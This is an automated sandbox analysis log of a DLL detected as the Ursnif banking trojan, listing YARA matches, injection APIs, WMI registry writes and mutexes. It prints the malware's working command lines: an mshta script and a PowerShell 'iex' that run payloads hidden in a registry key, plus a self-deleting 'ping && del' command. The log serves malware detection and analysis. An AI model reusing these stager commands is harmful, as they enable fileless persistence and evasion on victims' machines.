Source: Yara match File source: 6.2.rundll32.exe.31b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.f30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.4ad8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.2e38cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30994a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.rundll32.exe.4da94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.32e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.11c8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30994a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.32d8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.rundll32.exe.4da94a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.380707508.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.405323039.0000000002F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.408114811.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.441574566.0000000004DA9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.392684354.0000000004AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.379823360.0000000002E30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1031847284.0000000003099000.00000004.00000040.sdmp, type: MEMORY

E-Banking Fraud:

Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.440873523.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.521119646.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502401968.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502219800.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.471379540.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462394382.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462596690.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440860771.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462470408.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1014883407.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.521272154.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502330882.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440884295.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462528723.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502570590.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.448279110.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.524731514.00000000064C8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502479250.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.466413805.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440805888.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.443913452.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.521180114.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000003.521239146.0000019E72A0C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502279805.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440780908.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502609356.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440846323.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440750956.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.473802684.000000000585C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462613151.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440828072.0000000003A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502443301.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.450243555.000000000385C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462579053.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.502514325.0000000004AA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462505929.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.462554968.0000000005A58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 7044, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7076, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 2988, type: MEMORYSTR
Source: Yara match File source: 3.3.rundll32.exe.595a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.595a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.5a08d40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.59d94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.39d94a0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.3a08d40.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.3a08d40.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.395a4a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.395a4a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.471332372.00000000059D9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.471296215.000000000595A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.516409229.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.448235433.00000000039D9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.518371045.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.638276522.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.448202934.000000000395A000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.975772859.0000000000CC1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000002.1014253469.00000000009F1000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.760211370.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1031952216.00000000036DF000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.564342319.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000001F.00000000.514046155.00000000009F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 6.3.rundll32.exe.2f18cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.rundll32.exe.31b0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.f30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.rundll32.exe.4ad8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.3.rundll32.exe.2e38cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30994a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.rundll32.exe.4da94a0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.rundll32.exe.32e0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.3.loaddll32.exe.11c8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.loaddll32.exe.30994a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.3.rundll32.exe.32d8cd6.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.3.rundll32.exe.4da94a0.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000003.380707508.00000000032D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.405323039.0000000002F10000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.408114811.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.441574566.0000000004DA9000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.392684354.0000000004AD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.379823360.0000000002E30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1031847284.0000000003099000.00000004.00000040.sdmp, type: MEMORY
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F33FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 0_2_00F33FAB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_032E3FAB CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError, 3_2_032E3FAB

System Summary:

Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Writes registry values via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\rundll32.exe WMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Uses 32bit PE files
Source: 2u2mgtylJy.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Detected potential crypto function
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F32654 0_2_00F32654
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F37E30 0_2_00F37E30
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F34FA7 0_2_00F34FA7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_032E4FA7 3_2_032E4FA7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_032E7E30 3_2_032E7E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_032E2654 3_2_032E2654
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_031B4FA7 6_2_031B4FA7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_031B7E30 6_2_031B7E30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_031B2654 6_2_031B2654
Source: C:\Windows\System32\control.exe Code function: 31_2_00A0F2F0 31_2_00A0F2F0
Source: C:\Windows\System32\control.exe Code function: 31_2_00A0B530 31_2_00A0B530
Source: C:\Windows\System32\control.exe Code function: 31_2_00A040B4 31_2_00A040B4
Source: C:\Windows\System32\control.exe Code function: 31_2_00A1508C 31_2_00A1508C
Source: C:\Windows\System32\control.exe Code function: 31_2_00A1E0CF 31_2_00A1E0CF
Source: C:\Windows\System32\control.exe Code function: 31_2_00A07834 31_2_00A07834
Source: C:\Windows\System32\control.exe Code function: 31_2_009FE008 31_2_009FE008
Source: C:\Windows\System32\control.exe Code function: 31_2_009F3804 31_2_009F3804
Source: C:\Windows\System32\control.exe Code function: 31_2_00A03074 31_2_00A03074
Source: C:\Windows\System32\control.exe Code function: 31_2_00A1C874 31_2_00A1C874
Source: C:\Windows\System32\control.exe Code function: 31_2_009F9074 31_2_009F9074
Source: C:\Windows\System32\control.exe Code function: 31_2_00A159A8 31_2_00A159A8
Source: C:\Windows\System32\control.exe Code function: 31_2_00A0D9AC 31_2_00A0D9AC
Source: C:\Windows\System32\control.exe Code function: 31_2_00A14988 31_2_00A14988
Source: C:\Windows\System32\control.exe Code function: 31_2_009FB1D8 31_2_009FB1D8
Source: C:\Windows\System32\control.exe Code function: 31_2_00A0C9F0 31_2_00A0C9F0
Source: C:\Windows\System32\control.exe Code function: 31_2_00A0C1D4 31_2_00A0C1D4
Source: C:\Windows\System32\control.exe Code function: 31_2_00A0D150 31_2_00A0D150
Source: C:\Windows\System32\control.exe Code function: 31_2_00A132EC 31_2_00A132EC
Source: C:\Windows\System32\control.exe Code function: 31_2_00A1D2DC 31_2_00A1D2DC
Source: C:\Windows\System32\control.exe Code function: 31_2_00A08218 31_2_00A08218
Source: C:\Windows\System32\control.exe Code function: 31_2_00A09268 31_2_00A09268
Source: C:\Windows\System32\control.exe Code function: 31_2_00A1AA6C 31_2_00A1AA6C
Source: C:\Windows\System32\control.exe Code function: 31_2_00A07278 31_2_00A07278
Source: C:\Windows\System32\control.exe Code function: 31_2_009F6A68 31_2_009F6A68
Source: C:\Windows\System32\control.exe Code function: 31_2_00A1EB10 31_2_00A1EB10
Source: C:\Windows\System32\control.exe Code function: 31_2_00A06B1C 31_2_00A06B1C
Source: C:\Windows\System32\control.exe Code function: 31_2_009F2B74 31_2_009F2B74
Source: C:\Windows\System32\control.exe Code function: 31_2_00A164F4 31_2_00A164F4
Source: C:\Windows\System32\control.exe Code function: 31_2_00A03C24 31_2_00A03C24
Source: C:\Windows\System32\control.exe Code function: 31_2_00A00474 31_2_00A00474
Source: C:\Windows\System32\control.exe Code function: 31_2_00A0ED94 31_2_00A0ED94
Source: C:\Windows\System32\control.exe Code function: 31_2_00A1DD9C 31_2_00A1DD9C
Source: C:\Windows\System32\control.exe Code function: 31_2_00A08DF4 31_2_00A08DF4
Source: C:\Windows\System32\control.exe Code function: 31_2_00A085CC 31_2_00A085CC
Source: C:\Windows\System32\control.exe Code function: 31_2_00A19524 31_2_00A19524
Source: C:\Windows\System32\control.exe Code function: 31_2_00A0FD6C 31_2_00A0FD6C
Source: C:\Windows\System32\control.exe Code function: 31_2_00A07D44 31_2_00A07D44
Source: C:\Windows\System32\control.exe Code function: 31_2_009FC6F4 31_2_009FC6F4
Source: C:\Windows\System32\control.exe Code function: 31_2_00A16E34 31_2_00A16E34
Source: C:\Windows\System32\control.exe Code function: 31_2_009F8628 31_2_009F8628
Source: C:\Windows\System32\control.exe Code function: 31_2_009F779C 31_2_009F779C
Source: C:\Windows\System32\control.exe Code function: 31_2_00A0DFB8 31_2_00A0DFB8
Source: C:\Windows\System32\control.exe Code function: 31_2_00A0179C 31_2_00A0179C
Source: C:\Windows\System32\control.exe Code function: 31_2_00A13F08 31_2_00A13F08
Source: C:\Windows\System32\control.exe Code function: 31_2_00A09770 31_2_00A09770
Contains functionality to call native functions
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F322EC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 0_2_00F322EC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F33C64 GetProcAddress,NtCreateSection,memset, 0_2_00F33C64
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F337E0 NtMapViewOfSection, 0_2_00F337E0
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F38055 NtQueryVirtualMemory, 0_2_00F38055
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_032E37E0 NtMapViewOfSection, 3_2_032E37E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_032E3C64 GetProcAddress,NtCreateSection,memset, 3_2_032E3C64
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_032E22EC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 3_2_032E22EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 3_2_032E8055 NtQueryVirtualMemory, 3_2_032E8055
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_031B22EC NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose, 6_2_031B22EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_031B8055 NtQueryVirtualMemory, 6_2_031B8055
Source: C:\Windows\System32\control.exe Code function: 31_2_00A0FAA8 NtSetInformationProcess,CreateRemoteThread, 31_2_00A0FAA8
Source: C:\Windows\System32\control.exe Code function: 31_2_009F1A58 NtQueryInformationToken,NtQueryInformationToken,NtClose, 31_2_009F1A58
Source: C:\Windows\System32\control.exe Code function: 31_2_009F2B08 NtQueryInformationProcess, 31_2_009F2B08
Source: C:\Windows\System32\control.exe Code function: 31_2_00A2F00B NtProtectVirtualMemory,NtProtectVirtualMemory, 31_2_00A2F00B
PE file does not import any functions
Source: jdlmh2q4.dll.18.dr Static PE information: No import functions for PE file found
Source: yg5i0oy3.dll.29.dr Static PE information: No import functions for PE file found
Source: w34iw342.dll.20.dr Static PE information: No import functions for PE file found
Source: 4z2qptpk.dll.33.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: 2u2mgtylJy.dll Binary or memory string: OriginalFilenameSoon.dll8 vs 2u2mgtylJy.dll
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: 2u2mgtylJy.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\2u2mgtylJy.dll'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\2u2mgtylJy.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2u2mgtylJy.dll,Bonebegin
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\2u2mgtylJy.dll',#1
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2u2mgtylJy.dll,Father
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2u2mgtylJy.dll,Ratherdesign
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>K0qx='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(K0qx).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jdlmh2q4.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESD66D.tmp' 'c:\Users\user\AppData\Local\Temp\CSCCE0193F21C5D49109645DA91D5FFF210.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\w34iw342.cmdline'
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Cbv5='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Cbv5).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESE022.tmp' 'c:\Users\user\AppData\Local\Temp\CSC919BED62534A4CC3BF2669B466E033B8.TMP'
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\yg5i0oy3.cmdline'
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES889.tmp' 'c:\Users\user\AppData\Local\Temp\CSCCED00F42533349BEA98D8A77AE340CD.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\4z2qptpk.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1839.tmp' 'c:\Users\user\AppData\Local\Temp\CSC5471F709FE714810AB0D5625CD34D24.TMP'
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\Desktop\2u2mgtylJy.dll'
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\Documents\20211006
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_02dbrdif.tbr.ps1
Source: classification engine Classification label: mal100.troj.evad.winDLL@42/36@6/2
Source: C:\Windows\System32\mshta.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_00F311B8 CreateToolhelp32Snapshot,Process32First,StrStrIA,Process32Next,CloseHandle, 0_2_00F311B8
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\2u2mgtylJy.dll,Bonebegin
Source: C:\Windows\System32\loaddll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{3AEAFF9F-51F4-7CA1-AB0E-15700F2219A4}
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{420C970D-B9DE-C4F8-5396-FD38372A81EC}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{7E32BD42-C5B7-60C6-3F92-C994E3E60D08}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2920:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{A257D023-99F2-243B-33F6-DD98178A614C}
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{DAAB2CA3-7189-1CF4-CBAE-35102FC23944}
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1324:120:WilError_01
Source: C:\Windows\System32\loaddll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Source: C:\Windows\SysWOW64\rundll32.exe Automated click: OK
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: 2u2mgtylJy.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 2u2mgtylJy.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 2u2mgtylJy.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
